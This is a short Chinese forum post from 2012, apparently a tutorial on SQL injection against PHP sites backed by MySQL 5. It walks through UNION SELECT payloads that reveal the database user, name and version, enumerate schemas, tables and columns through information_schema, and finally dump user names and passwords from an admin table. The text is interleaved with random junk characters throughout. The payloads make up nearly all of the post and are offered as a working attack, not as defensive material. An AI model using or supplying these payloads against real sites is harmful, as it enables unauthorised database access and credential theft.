' R* S n2 Z- \4 h M% ^' H5 \. R+ H
教程内容:Mysql 5+php 注入
) a5 }- h" S0 J* P) _5 D7 p' L7 ^; G: `7 W
; \, l+ O9 L% D2 Q6 K
$ s b2 @) G0 Z3 `$ ?9 c
一.查看MYSQL基本信息(库名,版本,用户)) g" K; V) l/ B
, X& i' L/ Z: K* `# D# v# X3 _and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
2 K$ j8 p" P* m, _9 y/ m) `. w2 h w/ B
二.查数据库, B- G/ g M- k9 n0 r0 I2 B8 x
% a) @! C5 r$ k9 i4 pand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
0 q5 H8 m6 w* b6 b! {limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
0 J3 T1 ]8 A2 q6 u2 X/ g3 ^$ `
+ ~% j- _4 m- C$ o4 f三.暴表8 S2 c. N: ^0 P% e9 d) M$ u
' Y# j' X/ U! v' [! b- }1 I3 land 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/** X. b2 }4 C, E" |1 K
# l% y( j; g" B0 I, u9 y; Flimit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
+ ?: ]! K# C) e' ^( f. ~) I+ J/ r3 Y1 M* Z8 b* g! {
四.暴字段
" e" w: l, {) n e! e% j- u0 V: ]8 j! {0 B3 @5 M+ f: C
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
* ]! ? @8 l2 f+ V1 b3 W7 e3 c, u2 ~0 ]3 I: a
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。! O* I+ K5 P4 a' _
) Y( x7 l. N' r五.暴数据
! I6 M( K. t( F1 S z- Y$ {5 {8 P' q( u
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*/ ~5 _! q( d# |% m/ b
! ?, U+ w$ `# |" C* L8 O0 `. e8 {, p) W) ^4 j
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
/ y- ]- B5 J. D# w } |
发表于 2012-9-13 16:27:53
收藏
支持
反对